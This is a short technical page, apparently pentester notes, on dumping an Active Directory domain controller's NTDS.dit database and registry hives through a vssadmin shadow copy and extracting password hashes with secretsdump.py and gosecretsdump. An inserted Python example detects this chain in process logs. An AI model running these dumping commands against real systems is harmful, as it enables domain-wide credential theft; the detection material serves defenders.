NTDS.dit Dump & Extract

On the Domain Controller, create a snapshot with vssadmin.exe.

PS C:\temp> vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5
PS C:\temp>

To make extracting ntds.dit and the SYSTEM hive from the shadow copy easy, you can use ShadowCopyView.

Copy NTDS.dit

Path: C:\Windows\NTDS\ntds.dit

Copy SYSTEM

Path: C:\Windows\System32\config\SYSTEM

Preferably, also make a copy of:

  • SECURITY - C:\Windows\System32\config\SECURITY
  • SAM - C:\Windows\System32\config\SAM
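
From the defender's side, the steps above leave a recognisable trail in process-creation telemetry: a vssadmin snapshot on a DC followed by copies of ntds.dit and SYSTEM out of a HarddiskVolumeShadowCopy path. The following is an added detection example, not part of the original page; the log format, rule names and sample events are constructed assumptions (the fields mirror Sysmon Event ID 1 or Security 4688 with command-line auditing enabled).

```python
"""Flag the NTDS.dit shadow-copy dump chain in process-creation logs.
Each record is 'Image|CommandLine|User'; the records are constructed for
illustration, real ones would come from a Sysmon/4688 export."""
import re

# Constructed sample events: a snapshot, two copies out of the snapshot, noise.
SAMPLE_LOG = r"""
C:\Windows\System32\vssadmin.exe|vssadmin.exe create shadow /for=C:|CORP\svc-backup
C:\Windows\System32\cmd.exe|cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit C:\temp\ntds.dit|CORP\jdoe
C:\Windows\System32\vssadmin.exe|vssadmin.exe list shadows|CORP\svc-backup
C:\Windows\System32\cmd.exe|cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM C:\temp\SYSTEM|CORP\jdoe
C:\Windows\System32\notepad.exe|notepad.exe C:\temp\notes.txt|CORP\jdoe
"""

# (rule name, pattern applied to the command line); names are assumptions
RULES = [
    ("VSS snapshot created", re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
    ("ntds.dit read from shadow copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*ntds\.dit", re.I)),
    ("SYSTEM hive read from shadow copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+.*config\\SYSTEM", re.I)),
]
DUMP_CHAIN = {name for name, _ in RULES}

def parse_event(line):
    """Split one 'Image|CommandLine|User' record into a dict."""
    image, cmdline, user = line.split("|", 2)
    return {"image": image, "cmdline": cmdline, "user": user}

def detect(log_text):
    """Return (rule, user, cmdline) for every event matching a rule, in log order."""
    hits = []
    for raw in log_text.strip().splitlines():
        event = parse_event(raw)
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                hits.append((name, event["user"], event["cmdline"]))
    return hits

def full_chain_seen(hits):
    """True when snapshot creation and both hive/database reads appear together."""
    return DUMP_CHAIN <= {name for name, _, _ in hits}

if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("full NTDS dump chain observed:", full_chain_seen(hits))
```

A single snapshot alone is normal backup behaviour; the alert-worthy signal is the whole chain on a DC, so correlate before paging anyone.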

Extract hashes

secretsdump.py can get stuck in a loop and keep printing hashes. In that case (or even by preference) use Gosecretsdump.

Secretsdump.py

secretsdump.py -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile extracted-hashes -just-dc-ntlm -user-status -history

Gosecretsdump

./gosecretsdump -system SYSTEM -ntds NTDS.DIT -history -status -out hashes.log

Example NTDS/SYSTEM

Example NTDS.dit and SYSTEM files zipped below.